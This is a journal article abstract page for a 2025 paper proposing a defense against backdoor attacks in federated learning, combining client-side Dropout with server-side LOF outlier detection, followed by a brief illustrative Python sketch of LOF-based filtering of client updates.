CAI Yu, CHEN Ding, WANG Juan, et al. LOF-based Defense Against Federated Learning Backdoor Attacks[J]. Journal of Chengdu University of Information Technology, 2025, 40(04): 454-458. [doi:10.16836/j.cnki.jcuit.2025.04.007]
LOF-based Defense Method Against Federated Learning Backdoor Attacks
- Title:
- LOF-based Defense Against Federated Learning Backdoor Attacks
- Article ID:
- 2096-1618(2025)04-0454-05
- Keywords:
- backdoor defense; federated learning; backdoor attack; Dropout; outlier detection
- CLC number:
- TP391
- Document code:
- A
- Abstract:
- Addressing the problem of backdoor attacks in federated learning, this work examines several defense schemes and proposes a comprehensive strategy that combines client-side and server-side measures, grounded in Dropout and LOF outlier detection. On the client side, Dropout is applied during local training to strengthen the global model's resistance to backdoor samples; on the server side, the LOF outlier detection algorithm screens incoming model updates for anomalies. Experimental results show that the proposed scheme reduces the attack success rate (ASR) from 88.11% to 1.62% on the FMNIST dataset and from 95.45% to 0.25% on the EMNIST dataset, demonstrating a substantial drop in attack success and a robust backdoor defense. The research offers a practical approach to building more secure federated learning systems, balancing the global model's performance and security, and provides a more reliable foundation for the widespread adoption of federated learning.
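The abstract outlines a two-part defense: Dropout on the client side and LOF-based screening of client model updates on the server side before aggregation. The sketch below is a minimal illustration of that idea rather than the authors' implementation; the network architecture, dropout rate, `n_neighbors`, and the class and function names are assumptions, and each client update is assumed to be flattened into a single vector.

```python
# Illustrative sketch only: client-side Dropout + server-side LOF filtering
# before FedAvg-style averaging. Hyperparameters and names are assumptions.
import numpy as np
import torch.nn as nn
from sklearn.neighbors import LocalOutlierFactor

class ClientNet(nn.Module):
    """Toy client model for 28x28 grayscale images (e.g. FMNIST/EMNIST)."""
    def __init__(self, num_classes=10, p_drop=0.5):
        super().__init__()
        self.net = nn.Sequential(
            nn.Flatten(),
            nn.Linear(28 * 28, 256), nn.ReLU(),
            nn.Dropout(p_drop),          # client-side Dropout against backdoor samples
            nn.Linear(256, num_classes),
        )

    def forward(self, x):
        return self.net(x)

def lof_filter_and_average(client_updates, n_neighbors=5):
    """client_updates: list of flattened 1-D np.ndarray, one per client.

    n_neighbors should be smaller than the number of participating clients.
    """
    X = np.stack(client_updates)                            # (num_clients, num_params)
    labels = LocalOutlierFactor(n_neighbors=n_neighbors).fit_predict(X)
    inliers = X[labels == 1]                                # -1 marks suspected outliers
    if len(inliers) == 0:                                   # fall back if all are flagged
        inliers = X
    return inliers.mean(axis=0)                             # aggregate surviving updates
```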
Memo
Received: 2024-01-06
